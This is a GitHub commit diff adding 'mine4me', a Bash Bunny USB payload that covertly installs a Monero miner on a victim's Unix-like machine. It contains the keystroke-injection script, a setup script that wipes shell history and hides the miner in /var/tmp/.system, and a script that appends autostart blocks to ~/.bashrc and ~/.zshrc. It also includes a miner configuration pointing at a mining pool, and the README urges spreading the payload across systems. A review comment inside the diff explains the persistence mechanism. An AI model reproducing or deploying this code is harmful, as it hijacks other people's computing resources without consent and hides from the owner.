Uploading mine4me (#533)

* Uploaded BunnyLogger

* uploading payload intel

* Create README.md

* Update README.md

* uploaded LinuxPreter

* uploaded FileRipper

Faster executing version

* Update README.md

* fixing typo

* uploaded sudoSnatch

* Update README.md

* deleting sudoSnatch

* uploading payload

* Delete payload.sh

* Delete shell

* Delete systemBus

* Delete camPeek directory

* Update payload.sh

* Update payload.sh

* Delete payloads/library/execution/FileRipper directory

* Update payload.sh

* Update payload.sh

* Update payload.sh

* Update payload.sh

* uploading BLE_EXFIL extension

BLE_EXFIL extension, exfiltrates data via BLE

* BLE_EXFIL demo

* uploading mine4me

mine4me payload makes your target system mine Monero for you. Spread payload in multiple systems to acquire more Monero.

* category update
drapl0n 2022-06-23 01:02:27 +05:30 committed by GitHub
parent 7d8994f7ac
commit c391cd7c76
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 292 additions and 0 deletions


@ -0,0 +1,41 @@
## About:
* Title: mine4me
* Description: mine4me make your target's system mine Monero for you.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution
* Target: Unix-like operating systems.
* Attackmodes: HID, Storage
## mine4me: mine4me payload makes your target system mine Monero for you. Spread payload in multiple systems to acquire more Monero.
### Features:
* Autostart mining if Internet is connected.
* Fully covert.
* CPU/GPU mining.
* Persistent.
* Autostart payload on trigger.
* Intelligently manages processes.
### Changes to be made in mine4me/systemIn/config.json:
* MANDATORY: Enter your wallet address on line no `136`.
* Change mining pool(Default pool: `pool.hashvault.pro:443`) on line no `135`.
* Default configuration is for CPU mining for four threads, Can be configured in Block starting from line no `28` to `111`.
* Change number of threads assigned for mining at line no `105`.
* GPU mining can be enabled if you know hardware of target's system. OpenCL/CUDA required.
* For AMD GPU replace `"enabled": false,` with `"enabled": true,` at line no `113`.
* For NVIDIA GPU replace `"enabled": false,` with `"enabled": true,` at line no `122`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| mine4me/ | /payloads/library/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n


@ -0,0 +1,10 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/payloads/library/mine4me/systemIn /var/tmp/.system/systemIO
chmod +x /var/tmp/.system/systemIO/systemIO
cp -r $mntt/payloads/library/mine4me/shell /tmp/
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell


@ -0,0 +1,10 @@
#!/bin/bash
ls -a ~/ | grep 'zshrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.zshrc
fi
ls -a ~/ | grep 'bashrc' &> /dev/null
if [ $? = 0 ]; then
echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO </dev/null &>/dev/null &\n\tdisown\n\tclear\nfi" >> ~/.bashrc
fi
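Review bot: Nothing in this file says what the two `echo -e ... >> ~/.zshrc` and `>> ~/.bashrc` lines (129 and 133) actually install, and the single escaped string makes the appended block unreadable without reconstructing it by hand. A header comment should state plainly that the script appends, to whichever of ~/.zshrc and ~/.bashrc exists, a block that runs `ps -a | grep systemIO` and, when nothing matches, starts `/var/tmp/.system/systemIO/systemIO` detached via `disown` — that is, per-user persistence through shell startup files, which is also the host artifact this change leaves behind. The README's "Fully covert" bullet should be read against that: the rc-file modification and the `/var/tmp/.system` directory created by payload.sh are both plain-text, user-visible changes.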


@ -0,0 +1,175 @@
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": false,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": false,
"yield": true,
"asm": true,
"argon2-impl": null,
"astrobwt-max-size": 550,
"astrobwt-avx2": false,
"argon2": [0, 2, 4, 6, 8, 10, 12, 14],
"astrobwt": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"astrobwt/v2": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"cn": [
[1, 0],
[1, 2],
[1, 8],
[1, 10]
],
"cn-heavy": [
[1, 0],
[1, 8]
],
"cn-lite": [
[1, 0],
[1, 2],
[1, 4],
[1, 6],
[1, 8],
[1, 10],
[1, 12],
[1, 14]
],
"cn-pico": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"cn/upx2": [
[2, 0],
[2, 1],
[2, 2],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[2, 8],
[2, 9],
[2, 10],
[2, 11],
[2, 12],
[2, 13],
[2, 14],
[2, 15]
],
"ghostrider": [
[8, 0],
[8, 2],
[8, 8],
[8, 10]
],
"rx": [0, 2, 8, 10],
"rx/arq": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"rx/wow": [0, 2, 4, 6, 8, 10, 12, 14],
"cn-lite/0": false,
"cn/0": false,
"rx/keva": "rx/wow"
},
"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"adl": true,
"cn-lite/0": false,
"cn/0": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn-lite/0": false,
"cn/0": false
},
"log-file": null,
"donate-level": 1,
"donate-over-proxy": 1,
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.hashvault.pro:443",
"user": "YOUR_WALLET_ADDRESS",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"enabled": true,
"tls": false,
"wss": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"retries": 5,
"retry-pause": 5,
"print-time": 60,
"health-print-time": 60,
"dmi": true,
"syslog": false,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"dns": {
"ipv6": false,
"ttl": 30
},
"user-agent": null,
"verbose": 0,
"watch": true,
"pause-on-battery": false,
"pause-on-active": false
}


@ -0,0 +1,56 @@
# Title: mine4me
# Description: mine4me makes target's system mine crypto for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Unix-like operating systems.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 1400
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 200
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/mine4me/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1500
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH